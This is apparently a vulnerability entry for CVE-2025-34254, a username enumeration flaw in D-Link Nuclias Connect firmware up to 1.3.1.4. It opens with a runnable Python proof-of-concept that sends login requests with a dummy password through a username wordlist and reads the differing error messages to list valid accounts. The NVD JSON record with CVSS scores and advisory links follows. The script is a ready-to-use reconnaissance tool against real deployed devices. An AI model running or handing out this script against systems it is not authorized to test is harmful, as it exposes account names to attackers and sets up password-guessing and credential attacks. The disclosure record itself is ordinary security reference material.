CVE-2025-34254

#!/usr/bin/env python3 # CVE-2025-34254 - D-Link Nuclias Connect Account Enumeration PoC # This script demonstrates username enumeration via login endpoint response discrepancy import requests import sys import argparse TARGET_URL = "https://target-host/dashboard/api/login" # Adjust the login endpoint path def enumerate_usernames(target_url, username_file): """ Enumerate valid usernames by analyzing response differences in the login endpoint's error.message field. """ valid_users = [] with open(username_file, 'r') as f: usernames = [line.strip() for line in f if line.strip()] for username in usernames: # Construct login request payload payload = { "username": username, "password": "InvalidPassword123!@#" } try: response = requests.post( target_url, json=payload, verify=False, timeout=10 ) # Parse JSON response data = response.json() error_msg = data.get("error", {}).get("message", "") # Differentiate between existing and non-existing users # Existing user typically returns "Invalid password" or similar # Non-existing user returns "User not found" or similar if "password" in error_msg.lower() or "credential" in error_msg.lower(): print(f"[+] VALID USER FOUND: {username} -> {error_msg}") valid_users.append(username) elif "not found" in error_msg.lower() or "does not exist" in error_msg.lower(): print(f"[-] Invalid user: {username}") else: print(f"[?] Unknown response for {username}: {error_msg}") except requests.exceptions.RequestException as e: print(f"[!] Error requesting {username}: {e}") except ValueError: print(f"[!] Invalid JSON response for {username}") return valid_users if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-34254 PoC - D-Link Nuclias Connect Username Enumeration") parser.add_argument("-u", "--url", required=True, help="Target login URL") parser.add_argument("-f", "--file", required=True, help="Username wordlist file") args = parser.parse_args() print(f"[*] Starting enumeration against {args.url}") valid = enumerate_usernames(args.url, args.file) print(f"\n[*] Enumeration complete. Found {len(valid)} valid users: {valid}")

{"cve": {"id": "CVE-2025-34254", "sourceIdentifier": "[email protected]", "published": "2025-10-16T19:15:32.777", "lastModified": "2025-10-30T16:07:47.447", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "D-Link Nuclias Connect firmware versions <= 1.3.1.4 contain an observable response discrepancy vulnerability. The application's 'Login' endpoint returns distinct JSON responses depending on whether the supplied username is associated with an existing account. Because the responses differ in the `error.message`string value, an unauthenticated remote attacker can enumerate valid usernames/accounts on the server. NOTE: D-Link states that a fix is under development."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.3.1.4", "matchCriteriaId": "1DDE121F-E175-450D-A078-A7BF6F643415"}]}]}], "references": [{"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-login-account-enumeration", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}